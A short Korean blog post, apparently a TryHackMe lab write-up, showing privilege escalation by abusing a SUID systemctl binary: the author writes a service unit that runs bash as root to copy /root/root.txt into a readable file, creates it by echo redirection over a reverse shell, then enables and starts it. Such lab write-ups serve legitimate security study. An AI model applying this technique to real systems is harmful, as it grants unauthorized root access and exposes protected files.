Task 5. Privilege Escalation
- SUID를 이용한 권한 상승
- systemctl 이용
나는 systemctl를 서비스 시작/정지 작업을 위한 유틸리티로만 알고 있었는데, 다른 기능도 있더라.
systemctl 통해서 시스템 부팅 시 특정 서비스가 자동으로 시작하도록 설정할 수 있다. 마침 오늘 오전에 centOS tomcat 구축하며 알았다. 이 경험이 아니었으면 한참 더 헤맸을 듯 하다.
아무튼, 이를 이용하여 flag를 얻어보자.
1. pe.service
[Unit]
Description=pe to root
[Service]
ExecStart=/bin/bash -c 'cat /root/root.txt > flag.txt'
[Install]
WantedBy=multi-user.target- 리버스쉘 이후 vi만 켜면 오류가 잦아서, 리다이렉션 통해서 생성했다.
echo "내용" > pe.service
2. 서비스 등록
systemctl enable pe.service
systemctl start pe
3. 리버스쉘 끊고 다시 접근
- flag.txt 확인가능
'System > 침투' 카테고리의 다른 글
| THM Offensive Pentesting - Kenobi (0) | 2023.07.17 |
|---|---|
| THM Offensive Pentesting - Blue (0) | 2023.06.17 |
| APC injection 실습 (2) (0) | 2023.03.31 |
| APC Injection 실습 (1) (0) | 2023.03.30 |
| 3. APC(Asynchronous Procedure Call) Injection (0) | 2023.03.30 |